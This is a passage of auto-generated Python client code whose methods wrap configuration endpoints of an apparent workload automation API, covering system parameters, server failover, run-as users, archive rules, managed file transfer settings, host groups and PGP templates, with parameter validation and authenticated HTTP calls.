def set_system_param_with_http_info(self, body, name, **kwargs): # noqa: E501
"""set value of a an em system parameter # noqa: E501
Set value of an enterprise management system parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_system_param_with_http_info(body, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Value body: Param new value (required)
:param str name: Parameter name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_system_param" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `set_system_param`") # noqa: E501
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_system_param`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/em/param/{name}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def setasprimary(self, server, **kwargs): # noqa: E501
"""Set secondary server as Primary on a specified Server # noqa: E501
Set secondary server as Primary on a specified Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.setasprimary(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.setasprimary_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.setasprimary_with_http_info(server, **kwargs) # noqa: E501
return data
def setasprimary_with_http_info(self, server, **kwargs): # noqa: E501
"""Set secondary server as Primary on a specified Server # noqa: E501
Set secondary server as Primary on a specified Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.setasprimary_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method setasprimary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `setasprimary`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/setasprimary', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def test_run_as_user(self, server, agent, user, **kwargs): # noqa: E501
"""Test existed Run-as user # noqa: E501
Test existing Run-as user in server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.test_run_as_user(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:param RunAsUserDetailsData body: Run as user details data
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.test_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
else:
(data) = self.test_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
return data
def test_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501
"""Test existed Run-as user # noqa: E501
Test existing Run-as user in server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.test_run_as_user_with_http_info(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:param RunAsUserDetailsData body: Run as user details data
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'user', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method test_run_as_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `test_run_as_user`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `test_run_as_user`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `test_run_as_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/runasuser/{agent}/{user}/test', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_archive_rule(self, body, rule_name, **kwargs): # noqa: E501
"""Edit Workload Archiving rule # noqa: E501
Edit Workload Archiving rule details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_archive_rule(body, rule_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ArchiveRule body: Edit Workload Archiving rule details (required)
:param str rule_name: Rule name to update (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_archive_rule_with_http_info(body, rule_name, **kwargs) # noqa: E501
else:
(data) = self.update_archive_rule_with_http_info(body, rule_name, **kwargs) # noqa: E501
return data
def update_archive_rule_with_http_info(self, body, rule_name, **kwargs): # noqa: E501
"""Edit Workload Archiving rule # noqa: E501
Edit Workload Archiving rule details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_archive_rule_with_http_info(body, rule_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ArchiveRule body: Edit Workload Archiving rule details (required)
:param str rule_name: Rule name to update (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'rule_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_archive_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_archive_rule`") # noqa: E501
# verify the required parameter 'rule_name' is set
if ('rule_name' not in params or
params['rule_name'] is None):
raise ValueError("Missing the required parameter `rule_name` when calling `update_archive_rule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'rule_name' in params:
path_params['ruleName'] = params['rule_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/archive/rule/{ruleName}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_external_user(self, body, username, **kwargs): # noqa: E501
"""Update an external user # noqa: E501
Update an external user for b2b # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_external_user(body, username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ExternalUserData body: External user data (required)
:param str username: The external user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_external_user_with_http_info(body, username, **kwargs) # noqa: E501
else:
(data) = self.update_external_user_with_http_info(body, username, **kwargs) # noqa: E501
return data
def update_external_user_with_http_info(self, body, username, **kwargs): # noqa: E501
"""Update an external user # noqa: E501
Update an external user for b2b # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_external_user_with_http_info(body, username, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ExternalUserData body: External user data (required)
:param str username: The external user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'username'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_external_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_external_user`") # noqa: E501
# verify the required parameter 'username' is set
if ('username' not in params or
params['username'] is None):
raise ValueError("Missing the required parameter `username` when calling `update_external_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in params:
path_params['username'] = params['username'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/externaluser/{username}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_fts_settings(self, body, server, agent, **kwargs): # noqa: E501
"""Update File Transfer Server (FTS) configuration data. # noqa: E501
Update File Transfer Server (FTS) configuration data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_fts_settings(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FtsSettingsData body: File Transfer Server (FTS) configuration data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_fts_settings_with_http_info(body, server, agent, **kwargs) # noqa: E501
else:
(data) = self.update_fts_settings_with_http_info(body, server, agent, **kwargs) # noqa: E501
return data
def update_fts_settings_with_http_info(self, body, server, agent, **kwargs): # noqa: E501
"""Update File Transfer Server (FTS) configuration data. # noqa: E501
Update File Transfer Server (FTS) configuration data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_fts_settings_with_http_info(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FtsSettingsData body: File Transfer Server (FTS) configuration data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_fts_settings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_fts_settings`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `update_fts_settings`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `update_fts_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/fts/settings', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_hosts_in_hostgroup(self, body, server, hostgroup, **kwargs): # noqa: E501
"""update agents in hostgroup. # noqa: E501
update agents in hostgroup. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_hosts_in_hostgroup(body, server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param HostgroupProperties body: Agent list to update in a hostgroup (required)
:param str server: The Server the agent is connected to. (required)
:param str hostgroup: The hostgroup name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_hosts_in_hostgroup_with_http_info(body, server, hostgroup, **kwargs) # noqa: E501
else:
(data) = self.update_hosts_in_hostgroup_with_http_info(body, server, hostgroup, **kwargs) # noqa: E501
return data
def update_hosts_in_hostgroup_with_http_info(self, body, server, hostgroup, **kwargs): # noqa: E501
"""update agents in hostgroup. # noqa: E501
update agents in hostgroup. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_hosts_in_hostgroup_with_http_info(body, server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param HostgroupProperties body: Agent list to update in a hostgroup (required)
:param str server: The Server the agent is connected to. (required)
:param str hostgroup: The hostgroup name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'hostgroup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_hosts_in_hostgroup" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_hosts_in_hostgroup`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `update_hosts_in_hostgroup`") # noqa: E501
# verify the required parameter 'hostgroup' is set
if ('hostgroup' not in params or
params['hostgroup'] is None):
raise ValueError("Missing the required parameter `hostgroup` when calling `update_hosts_in_hostgroup`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'hostgroup' in params:
path_params['hostgroup'] = params['hostgroup'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/hostgroup/{hostgroup}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_mft_configuration(self, body, server, agent, **kwargs): # noqa: E501
"""Update MFT Configuration # noqa: E501
Update MFT Configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mft_configuration(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param MftConfigurationData body: MFT Configuration Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_mft_configuration_with_http_info(body, server, agent, **kwargs) # noqa: E501
else:
(data) = self.update_mft_configuration_with_http_info(body, server, agent, **kwargs) # noqa: E501
return data
def update_mft_configuration_with_http_info(self, body, server, agent, **kwargs): # noqa: E501
"""Update MFT Configuration # noqa: E501
Update MFT Configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mft_configuration_with_http_info(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param MftConfigurationData body: MFT Configuration Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_mft_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_mft_configuration`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `update_mft_configuration`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `update_mft_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/configuration', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_mft_folder(self, body, folder_name, **kwargs): # noqa: E501
"""Update an existing virtual folder in MFT. # noqa: E501
Update an existing virtual folder in MFT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mft_folder(body, folder_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FolderPropertiesData body: virtual folder data (required)
:param str folder_name: Name of folder (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_mft_folder_with_http_info(body, folder_name, **kwargs) # noqa: E501
else:
(data) = self.update_mft_folder_with_http_info(body, folder_name, **kwargs) # noqa: E501
return data
def update_mft_folder_with_http_info(self, body, folder_name, **kwargs): # noqa: E501
"""Update an existing virtual folder in MFT. # noqa: E501
Update an existing virtual folder in MFT. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mft_folder_with_http_info(body, folder_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FolderPropertiesData body: virtual folder data (required)
:param str folder_name: Name of folder (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'folder_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_mft_folder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_mft_folder`") # noqa: E501
# verify the required parameter 'folder_name' is set
if ('folder_name' not in params or
params['folder_name'] is None):
raise ValueError("Missing the required parameter `folder_name` when calling `update_mft_folder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'folder_name' in params:
path_params['folderName'] = params['folder_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/virtualfolder/{folderName}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_mft_user_group(self, body, name, **kwargs): # noqa: E501
"""Update user group. # noqa: E501
Update user group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mft_user_group(body, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserGroupDetailsData body: User group details (required)
:param str name: User group name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_mft_user_group_with_http_info(body, name, **kwargs) # noqa: E501
else:
(data) = self.update_mft_user_group_with_http_info(body, name, **kwargs) # noqa: E501
return data
def update_mft_user_group_with_http_info(self, body, name, **kwargs): # noqa: E501
"""Update user group. # noqa: E501
Update user group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mft_user_group_with_http_info(body, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserGroupDetailsData body: User group details (required)
:param str name: User group name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_mft_user_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_mft_user_group`") # noqa: E501
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `update_mft_user_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/usergroup/{name}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_pgp_template(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Update PGP Template # noqa: E501
Update PGP Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pgp_template(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PgpTemplateData body: PGP Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The PGP Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_pgp_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
else:
(data) = self.update_pgp_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
return data
def update_pgp_template_with_http_info(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Update PGP Template # noqa: E501
Update PGP Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pgp_template_with_http_info(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PgpTemplateData body: PGP Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The PGP Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent', 'template_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_pgp_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_pgp_template`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `update_pgp_template`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `update_pgp_template`") # noqa: E501
# verify the required parameter 'template_name' is set
if ('template_name' not in params or
params['template_name'] is None):
raise ValueError("Missing the required parameter `template_name` when calling `update_pgp_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'template_name' in params:
path_params['templateName'] = params['template_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
